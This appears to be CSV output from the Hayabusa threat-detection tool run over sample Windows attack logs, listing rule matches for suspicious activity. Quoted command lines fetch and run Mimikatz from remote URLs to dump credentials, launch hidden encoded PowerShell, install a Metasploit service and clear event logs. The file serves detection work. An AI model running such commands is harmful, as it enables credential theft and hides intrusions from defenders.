@""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 
0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/4794_DSRM_password_change_t1098.evtx 2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 
03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle 
Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
